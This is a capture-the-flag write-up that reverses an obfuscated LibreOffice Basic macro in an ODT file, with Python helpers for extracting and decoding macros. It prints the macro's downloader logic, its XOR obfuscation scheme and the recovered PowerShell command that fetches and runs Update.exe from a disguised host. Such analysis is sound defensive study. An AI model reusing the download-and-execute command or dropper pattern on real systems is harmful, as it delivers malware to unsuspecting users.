Jun 18, 2022
4 mins read
Category: Reverse
Creator: HømardBøy
Attachments:
This challenge gives us an ODT file (that I didn't open, but you can do it at your own risk). Since it was in the Reverse category, we can easily guess that we will have to reverse a macro embedded in the document.
That's also what the description of the challenge tells us, pointing out that we have to identify the URL of a malicious resource downloaded by this document.
I'm not super familiar with the ODT document format, but I know one thing: the OpenDocument formats (as well as the Microsoft document formats, by the way) use ZIP archives! Therefore we can open them with regular archive software.
I looked around and found a file called Module1.xml in the folder Basic/Standard. This name really reminded me of the default name for Visual Basic classes (and that's the language used for macros).
In this XML file we find the Basic source of the module (LibreOffice Basic, a close relative of VBA, which is what ODT macros are written in), and it really doesn't look appealing: every identifier has been replaced with a random string of letters.
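Because the container is just a ZIP archive with the macro source stored as XML text, pulling the macros out can be scripted without ever opening the document in an office suite. The Python below is an added example, not code from this writeup: it builds a small in-memory stand-in for such an ODT (the module body, library index files and archive layout beyond what the post describes are constructed for the demo), extracts every Basic module found under Basic/<Library>/*.xml, and lists the Win32 imports each module declares, since an import such as urlmon!URLDownloadToFileA is the quickest tell of a downloader.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# Namespaces LibreOffice uses for Basic module XML and for the library index files
SCRIPT_NS = "http://openoffice.org/2000/script"
LIBRARY_NS = "http://openoffice.org/2000/library"

# Constructed stand-in for the challenge module: same storage format, harmless body.
# '&' must be written as '&amp;' inside the XML text, exactly as LibreOffice stores it.
SAMPLE_MODULE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub Main
    Dim u As String
    u = Chr(104) &amp; "" &amp; Chr(116) &amp; "" &amp; Chr(116) &amp; "" &amp; Chr(112)
    URLDownloadToFile(0, u, Environ("TEMP") &amp; "/payload.bin", 0, 0)
End Sub</script:module>
"""


def build_sample_odt() -> bytes:
    """Build an in-memory ODT-like ZIP with one Basic library ("Standard") and one module.
    Constructed test data: a real document carries many more members (styles, content, ...)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        zf.writestr("content.xml", "<doc/>")
        zf.writestr("Basic/script-lc.xml",
                    f'<library:libraries xmlns:library="{LIBRARY_NS}"/>')
        zf.writestr("Basic/Standard/script-lb.xml",
                    f'<library:library xmlns:library="{LIBRARY_NS}"/>')
        zf.writestr("Basic/Standard/Module1.xml", SAMPLE_MODULE_XML)
    return buf.getvalue()


def extract_basic_modules(odt_bytes: bytes) -> dict:
    """Return {archive path: Basic source} for every script:module stored under Basic/."""
    modules = {}
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("Basic/") and name.endswith(".xml")):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # malformed member: not something we can read as a module
            # Library index files (script-lc.xml, script-lb.xml) have other root tags
            if root.tag == f"{{{SCRIPT_NS}}}module":
                modules[name] = root.text or ""
    return modules


# Declare Function/Sub <name> Lib "<dll>" [Alias "<export>"]
DECLARE_RE = re.compile(
    r'Declare\s+(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"(?:\s+Alias\s+"([^"]+)")?',
    re.IGNORECASE,
)


def find_declares(source: str) -> list:
    """List (name, library, alias) for every Win32 import a module declares."""
    return DECLARE_RE.findall(source)


if __name__ == "__main__":
    for path, src in extract_basic_modules(build_sample_odt()).items():
        print(path)
        for name, lib, alias in find_declares(src):
            print(f"  imports {lib}!{alias or name} as {name}")
```

Against a real sample, replace build_sample_odt() with the bytes of the .odt file; nothing in the extraction depends on the constructed module body.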
The sub that caught my attention is the Main sub:
Sub Main
    If vqqzycjqjpkhqvovmi() = 0 Then
        Dim wzhtvfbpqbuzmustotc, Tmpwzhtvfbpqbuzmustotc As String
        Dim hbtogbnfbxcaekszei, regaajfhpscnbmcwmwprjge As String
        Dim ytnqvabyudituwreskajsxwdAs As String
        Dim lhpvebwowSplit As Integer
        If erwgpzsepdzttmjuvnovbwtc() = 1 Then
            Tmpwzhtvfbpqbuzmustotc = mpocpedrdedylqthvgzdapya()
            wzhtvfbpqbuzmustotc = amwxnlxcctjstjjgqlkspqnm(Tmpwzhtvfbpqbuzmustotc)
            hbtogbnfbxcaekszei = cxyhvqmc(Tmpwzhtvfbpqbuzmustotc & wzhtvfbpqbuzmustotc)
            regaajfhpscnbmcwmwprjge = qbyghksgdipg(hbtogbnfbxcaekszei)
            regaajfhpscnbmcwmwprjge = yqzfgdmt(regaajfhpscnbmcwmwprjge)
            rukbizjwgxckvFlag(regaajfhpscnbmcwmwprjge)
            ...
Once we clean and translate it a bit, we get:
Sub Main
    ' Note: "Dim a, b As String" only types b; a would be a Variant, so each variable is typed explicitly
    Dim FileName As String, FolderPath As String
    Dim FileContent As String, DecryptedCode As String
    FolderPath = CreateTempFolder()
    FileName = DownloadCode(FolderPath)          ' fetches the first stage into the temp folder
    FileContent = ReadFile(FolderPath & FileName)
    DecryptedCode = ReplaceThings(FileContent)   ' strip filler, split into tokens
    DecryptedCode = Decrypt(DecryptedCode)       ' XOR each token back into a character
    Run(DecryptedCode)                           ' executes the recovered command line
    ...
First I checked this "DownloadCode" sub. It calls an external Windows function called URLDownloadToFile, and since it is imported in the code, we can find its signature:
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szqegxabjgwrvivilr As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
From this, we infer that the URL is the second argument (szURL); the third argument, whose name has been obfuscated here, is the local path the download is written to, so the call both tells us where the payload comes from and where it lands on disk.
Next, something we can find across the whole script is the way it builds strings, one Chr() call per character. For example:
wbsggcbesxgmx = Chr(104) & "" & Chr(116) & "" & Chr(116) & "" & Chr(112) & "" & Chr(115) & "" & Chr(58) & "" & Chr(47) & "" & Chr(47) & "" & Chr(114) & "" & Chr(101) & "" & Chr(110) & "" & Chr(116) & "" & Chr(114) & "" & Chr(121) & "" & Chr(46) & "" & Chr(99) & "" & Chr(111) & "" & Chr(47) & "" & Chr(116) & "" & Chr(54) & "" & Chr(57) & "" & Chr(104) & "" & Chr(104) & "" & Chr(52) & "" & Chr(47) & "" & Chr(114) & "" & Chr(97) & "" & Chr(119) & ""
URLDownloadToFile(ynkgtlqhx, wbsggcbesxgmx, Macrokvjymzmbg, ynkgtlqhx, ynkgtlqhx)
I chose this example on purpose because it builds the string used as the URL. The resulting URL is: https://rentry.co/t69hh4/raw
I tried this URL as the flag but obviously it couldn’t be that simple. In fact, the content of this file is a very big number:
509923764891063459923764891063539923764891063399923764891063489923764891063499923764891063429923764891063399923764891063469923764891063469923764891063108992376489106339992376489106358992376489106339992376489106398992376...
So let’s look at the other subs:
Function ReplaceThings(BigNumber As String) As String
    Dim result As String
    ' Strip the filler sequence first, then turn the separator into spaces.
    ' Both replacements must chain on result, otherwise the first one is lost.
    result = Replace(BigNumber, "9657665657376593676575387986", "")
    result = Replace(result, "9923764891063", " ")
    ReplaceThings = result
End Function

Function Decrypt(EncryptedString As String) As String
    Dim Characters() As String
    Dim i As Long
    Dim result As String
    result = ""
    Characters = Split(EncryptedString, " ")
    For i = LBound(Characters) To UBound(Characters)
        If Len(Characters(i)) > 0 Then
            ' Each token is the ASCII code of one character XORed with 66
            result = result & Chr(CLng(Characters(i)) Xor 66)
        End If
    Next i
    Decrypt = result
End Function
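Both halves of the string obfuscation, the Chr() chains shown earlier and the ReplaceThings/Decrypt pair above, are simple enough to reimplement outside Basic, which is also safer than running any part of the macro. The Python below is an added example, not code from this writeup: it decodes the Chr() chain quoted above, strips the filler and splits on the separator exactly as ReplaceThings does, XORs each token with 66 as Decrypt does, and, because the page shows only the beginning of the downloaded blob, includes an encoder so the decoder can be exercised on constructed input (where the real blob places its filler is not shown on the page; the positions used here are an assumption).

```python
import re

SEP = "9923764891063"                    # separator between encoded characters
JUNK = "9657665657376593676575387986"    # filler the macro strips out first
XOR_KEY = 66


def decode_chr_chain(basic_expr: str) -> str:
    """Rebuild the literal behind a Basic  Chr(104) & "" & Chr(116) ...  expression."""
    return "".join(chr(int(n)) for n in re.findall(r"Chr\((\d+)\)", basic_expr))


def replace_things(big_number: str) -> str:
    """Python twin of ReplaceThings: drop the filler, then turn separators into spaces.
    Order matters: removing the filler before splitting means a filler sitting inside
    a token leaves that token intact once it is gone."""
    return big_number.replace(JUNK, "").replace(SEP, " ")


def decrypt(spaced: str) -> str:
    """Python twin of Decrypt: every token is one ASCII code XORed with 66."""
    return "".join(chr(int(tok) ^ XOR_KEY) for tok in spaced.split())


def deobfuscate(big_number: str) -> str:
    return decrypt(replace_things(big_number))


def obfuscate(plaintext: str, junk_every: int = 4) -> str:
    """Inverse of the scheme, used only to build test input.
    Appends the filler to every junk_every-th token; the real blob's filler
    positions are not visible on the page, so this placement is an assumption."""
    out = []
    for i, ch in enumerate(plaintext, 1):
        tok = str(ord(ch) ^ XOR_KEY)
        out.append(tok + JUNK if i % junk_every == 0 else tok)
    return SEP.join(out)


# Quoted from the writeup: the Chr() chain that builds the first-stage URL.
PAGE_CHR_CHAIN = (
    'Chr(104) & "" & Chr(116) & "" & Chr(116) & "" & Chr(112) & "" & Chr(115) & "" & '
    'Chr(58) & "" & Chr(47) & "" & Chr(47) & "" & Chr(114) & "" & Chr(101) & "" & '
    'Chr(110) & "" & Chr(116) & "" & Chr(114) & "" & Chr(121) & "" & Chr(46) & "" & '
    'Chr(99) & "" & Chr(111) & "" & Chr(47) & "" & Chr(116) & "" & Chr(54) & "" & '
    'Chr(57) & "" & Chr(104) & "" & Chr(104) & "" & Chr(52) & "" & Chr(47) & "" & '
    'Chr(114) & "" & Chr(97) & "" & Chr(119) & ""'
)

# Quoted from the writeup: the visible start of the downloaded number blob,
# cut just before the partial separator where the page truncates it.
PAGE_BLOB_PREFIX = (
    "509923764891063" "459923764891063" "539923764891063" "399923764891063"
    "489923764891063" "499923764891063" "429923764891063" "399923764891063"
    "469923764891063" "469923764891063" "1089923764891063" "399923764891063"
    "589923764891063" "39"
)


if __name__ == "__main__":
    print("first stage :", decode_chr_chain(PAGE_CHR_CHAIN))
    print("blob prefix :", deobfuscate(PAGE_BLOB_PREFIX))
    # Constructed round trip through the whole scheme, filler included
    sample = "powershell.exe -nop -w hidden"
    print("round trip  :", deobfuscate(obfuscate(sample)) == sample)
```

For the real sample, read the file fetched from the first-stage URL and pass its contents to deobfuscate(); the only inputs the macro feeds it are the filler, the separator and the XOR key shown above.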
From there, decrypting the text becomes fairly easy, by using those two functions. We then get:
powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile("http://microsoft.security.update.fake/files/Update.exe","$env:APPDATA\\Update.exe"); Start-Process ("$env:APPDATA\\Update.exe")
This gives us a second URL, the one the recovered PowerShell stage fetches Update.exe from before running it out of %APPDATA%, and that URL is the flag: http://microsoft.security.update.fake/files/Update.exe